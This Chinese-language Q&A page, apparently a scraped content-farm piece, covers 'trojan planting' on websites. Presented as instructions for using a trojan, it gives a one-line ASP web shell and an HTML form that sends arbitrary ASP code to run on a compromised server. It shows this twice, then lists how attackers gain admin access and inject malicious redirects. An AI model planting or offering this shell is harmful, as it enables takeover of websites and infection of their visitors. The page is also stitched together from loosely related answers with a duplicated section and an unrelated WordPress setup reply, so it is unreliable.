wordpress 掛馬,什么是網頁掛馬?
網頁掛馬是指通過網站漏洞入侵并修改相關網頁相關代碼,比如在用戶常瀏覽的頁面插入惡意的js代碼,或者經典的flash漏洞文件,這樣在其他人瀏覽被掛馬網頁的時候就會被執行惡意代碼并下載相關的木馬文件到用戶電腦里面去,以前很多用戶明明沒有運行可疑文件,卻中木馬了,多數就是因為瀏覽了被掛馬的網頁導致的。
怎樣用木馬?
一句話木馬就是在asp文件插入類似于這樣的代碼"<%execute request("nneeenn")%>"execute函數允許執行任意asp代碼在客戶端寫一個表單<form action="你掛馬的頁面" method="post"><input type="text" name="nneeenn" value=""><%--!此處的nneenn和<%execute request("nneeenn")%>中的nneeenn必須一致--%><input type="submit" value="發送"></form>把上面的代碼保存成mm.html打開在里面輸入你要執行的asp代碼點擊發送這時 你寫的asp 代碼就在遠程執行了而那個asp代碼可以是個小木馬
木馬怎么用?
一句話木馬就是在asp文件插入類似于這樣的代碼"<%executerequest("nneeenn")%>"execute函數允許執行任意asp代碼
在客戶端寫一個表單
<formaction="你掛馬的頁面"method="post">
<inputtype="text"name="nneeenn"value=""><%--!此處的nneenn和<%executerequest("nneeenn")%>中的nneeenn必須一致--%>
<inputtype="submit"value="發送">
</form>
把上面的代碼保存成mm.html
打開
在里面輸入你要執行的asp代碼
點擊發送
這時你寫的asp代碼就在遠程執行了
而那個asp代碼可以是個小木馬
掛馬是什么?
所謂的掛馬,就是黑客通過各種手段,包括SQL注入,網站敏感文件掃描,服務器漏洞,網站程序0day, 等各種方法獲得網站管理員賬號,然后登陸網站后臺,通過數據庫“備份/恢復”或者上傳漏洞獲得一個webshell。
利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。
也可以直接通過弱口令獲得服務器或者網站FTP,然后直接對網站頁面直接進行修改。
當你訪問被加入惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒。
如何快速搭建Wordpress網站?
首先,WordPress是一個開源的網站博客程序。
您可以去它的官網(cn.wordpress.org)上,下載安裝包到您的虛擬主機上進行安裝。
以下為安裝步驟的圖片,請您收下。